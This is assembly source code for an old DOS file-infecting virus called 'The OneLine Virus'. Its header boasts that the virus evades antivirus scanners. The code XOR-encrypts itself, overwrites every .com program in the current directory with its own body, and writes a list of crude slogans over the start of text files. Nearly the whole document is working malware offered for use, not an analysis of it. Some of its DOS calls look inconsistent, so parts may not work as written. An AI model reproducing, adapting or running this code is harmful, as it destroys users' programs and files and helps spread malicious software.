; ------------------------------------------------------------ ; -- The OneLine Virus -- ; -- By Arsonic[CodeBreakers] -- ; -- HTTP://CODEBREAKERS.SIMPLENET.COM -- ; ------------------------------------------------------------ ; Virus Info: This Virus is a 600 byte Long Encrypted Overwriting piece of ; shit. it will infect all *.com file in the current directory and overwrite ; the first line of all text files found with Famous Lines And Stuff.. ; Detected By: ; TBAV: Says This is a Unknown Virus.. But Only on the First Generation.. :) ; FPROT: ??? did'n have it on my computer at the time of scanning.. ; AVP: Nope.. Detected 3000 other virus's i got on my comp.. but not this one.. jmp crypt_start start: mov di,si mov cx,crypt_start call crypt jmp crypt_start crypt: xorloop: lodsb xor al,byte ptr[xor_value] stosb loop xorloop ret xor_value db 0 crypt_start: mov ah,4eh lea dx,mask int 21h jnc infect jmp text infect: mov ax,3d02h mov dx,9eh int 21h mov bx,ax ; I suggest 'xchg bx,ax', because its only 1 byte, but thats your decision in al,40h mov byte ptr [xor_value],al lea si,crypt_start lea di,end mov cx,end - crypt_start call crypt mov ah,40h mov cx,crypt_start - start lea dx,start int 21h mov ah,40h mov cx,end - crypt_start lea dx,end int 21h mov ah,3eh int 21h jmp find_next find_next: mov ah,3fh int 21h jnc infect jmp text text: mov ah,4eh lea dx,textmask int 21h jnc text_payload jmp close text_payload: mov ax,3d02h mov dx,9eh int 21h mov ah,40h mov cx,message_end - message_start lea dx,message_start int 21h mov ah,3fh int 21h jmp text_findnext text_findnext: mov ah,4fh int 21h jnc text_payload jmp close message_start: db 'LEGALIZE CANNABUS!' db 'HO HO HO.. NOW I HAVE A MACHINE GUN!' db 'This is another 60 minutes...' db 'Burn Baby, BURN!' db 'Keep The Opressor Opressing..' db 'Have U Had Your Break TodaY?' db 'Oh I Wish I Was A Ocsar Myer Wiener!' db 'What Came First The Chicken Or the Egg?' db 'Help Me.. Help You!' db 'SHOW ME THE MONEY!!' db 'Take it Off Baby!' db 'ADRIAN!!!!' db 'Where do You Want To Go Today?' db 'We Are the Shitty VR! VRLAND SUX SHIT!' db 'INCOMING!!!!!!!! BOOOOOOOOOMMMMMM!' message_end: close: int 20h mask db '*.com',0 textmask db '*.txt',0 author db ' ARSONIC [CODEBREaKERS]',13,10,'$' virus db 'THE OnELINE VIRUS',13,10,'$' origin db 'PROUDLY MADE IN CANADA..',13,10,'$' end: